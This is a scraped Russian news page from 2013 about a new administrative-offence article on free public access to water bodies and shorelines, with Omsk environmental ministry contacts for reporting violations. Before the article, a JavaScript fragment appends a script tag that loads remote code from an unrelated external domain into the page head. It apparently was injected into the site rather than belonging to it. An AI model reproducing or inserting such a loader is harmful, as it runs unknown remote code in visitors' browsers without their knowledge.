, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
7 ноября, 2013 Природа

О свободном доступе к водным объектам и береговой полосе

В октябре 2013 г. Кодекс об административных правонарушениях РФ дополнен статьей 8.12.1, устанавливающей административную ответственность за несоблюдение условий обеспечения свободного доступа граждан к водному объекту общего пользования и его береговой полосе.

Поверхностные водные объекты, находящиеся в государственной или муниципальной собственности, являются водными объектами общего пользования, то есть каждый гражданин вправе иметь доступ к водным объектам общего пользования и бесплатно использовать их для личных и бытовых нужд (без использования механических транспортных средств).

За ограничение свободного доступа к водным объектам общего пользования предусмотрена санкция в виде штрафа с максимальным размером до 300 тыс. рублей или административное приостановление деятельности на срок до девяноста суток (для юридических лиц).

Министерством природных ресурсов и экологии Омской области ведется постоянный контроль за соблюдением требований водного законодательства.

В случае если, Вы столкнулись с ситуацией, связанной с ограничением доступа к водным объектам общего пользования и его береговой полосе просим сообщить в Министерство по адресу: 644001, г. Омск, ул. Куйбышева, д. 63, на электронную почту: post@mpr.omskportal.ru, по телефону «Зеленая линия»: 39-35-35.

В данных сообщениях по возможности просим сообщать наименование водного объекта и его местоположение, а также наименование лиц, ограничивающих свободный доступ к водному объекту.

Источник: Минприроды и экологии

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Природа